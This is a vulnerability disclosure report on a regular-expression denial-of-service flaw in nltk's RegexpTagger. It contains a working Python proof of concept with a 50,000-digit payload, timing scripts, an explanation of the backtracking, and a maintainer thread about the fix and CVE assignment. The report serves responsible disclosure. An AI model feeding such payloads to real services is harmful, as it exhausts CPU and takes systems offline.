Inefficient Regular Expression Complexity in nltk/nltk
Reported on
Dec 7th 2021
Description
nltk is vulnerable to a ReDoS attack because of the regex ^-?[0-9]+(.[0-9]+)?$. If an attacker manages to feed a malicious payload to the RegexpTagger used in the functions get_pos_tagger and malt_regex_tagger, it will cause a nasty DoS.
Proof of Concept
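# PoC.py
import re
import time

# The unescaped "." matches any character, including digits.
pattern = re.compile(r"^-?[0-9]+(.[0-9]+)?$")

# A long run of digits followed by a non-digit forces the match to fail.
s = "-" + "0" * 50000 + "q"

t = time.time()
print("searching...")
pattern.search(s)
print(time.time() - t)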
On my new machine, only 50k characters were needed to make matching take 23+ seconds. For comparison, in a similar report to this project, 160k characters were processed in just 3+ seconds.
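To see how the matching time grows with input length, the PoC can be run at a few smaller sizes. This is a minimal sketch: the helper name time_failed_match and the chosen sizes are illustrative assumptions, not part of nltk, and absolute timings will differ between machines.

```python
import re
import time

# Same pattern as in the PoC above.
VULNERABLE = re.compile(r"^-?[0-9]+(.[0-9]+)?$")


def time_failed_match(n_digits):
    """Time one failing search on '-' + n_digits zeros + 'q' (hypothetical helper)."""
    payload = "-" + "0" * n_digits + "q"
    start = time.perf_counter()
    result = VULNERABLE.search(payload)
    elapsed = time.perf_counter() - start
    return result, elapsed


if __name__ == "__main__":
    # Each doubling of the input should cost noticeably more than twice the time.
    for n in (2_000, 4_000, 8_000):
        _, elapsed = time_failed_match(n)
        print(f"{n:>6} digits: {elapsed:.3f} s")
```

If the time roughly quadruples when the input doubles, the growth is quadratic, which would be consistent with the 50k figure reported above.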
Issue
The issue here is that in ^-?[0-9]+(.[0-9]+)?$ the unescaped . matches any character, digits included, so the groups [0-9]+ and (.[0-9]+) can match the same input. This causes nasty backtracking when the match fails.
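The overlap can be illustrated by comparing the pattern with a variant in which the dot is escaped. This is a sketch under the assumption that the dot was meant to be a literal decimal point; the patch actually applied by the maintainers is not shown in this report, and the name ESCAPED is only illustrative.

```python
import re

# Pattern from the report: "." matches any character except a newline.
VULNERABLE = re.compile(r"^-?[0-9]+(.[0-9]+)?$")

# Assumed intent: "\." matches only a literal decimal point.
ESCAPED = re.compile(r"^-?[0-9]+(\.[0-9]+)?$")

# The unescaped dot accepts strings that are not numbers at all.
print(bool(VULNERABLE.search("1x5")))   # True
print(bool(ESCAPED.search("1x5")))      # False

# Ordinary numbers are accepted by both patterns.
print(bool(VULNERABLE.search("-3.14")))  # True
print(bool(ESCAPED.search("-3.14")))     # True

# With the escaped dot, the digit run can no longer be split between
# the two groups, so the PoC payload is rejected quickly.
payload = "-" + "0" * 50000 + "q"
print(ESCAPED.search(payload))           # None
```

With the escaped variant, the optional group can only start at a literal ".", so a failed match does not retry every possible split of the digit run.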
Impact
This vulnerability can cause a DoS through CPU resource consumption.
Occurrences
@admin Greetings, I was told that CVEs are assigned and published roughly 1 hour after the fix. This repo used to assign CVEs for the same bug: https://nvd.nist.gov/vuln/detail/CVE-2021-3828 Has something changed?
@scara31 - thanks for getting in touch!
Our system no longer automatically assigns CVEs for certain CWE types, including Inefficient Regular Expression Complexity. However, if the maintainer (@tomaarsen) is happy, we can go ahead and publish a CVE for this report.
@admin Got it, thanks for the reply! I will try to contact @tomaarsen then.
@scara31 Consider me contacted - I'm happy with the fix that is in place, but I must say that a fixed release has not yet been published. I'm unsure whether the CVE ought to only be created when such a release is out. If so, then we should wait. Otherwise, feel free to publish the CVE.
@tomaarsen That's good to hear, of course I can wait as long as you need!
The newest release has been published, containing this patch. Thanks again.
@tomaarsen That's great to hear! With your permission, should I ask admin to assign the CVE?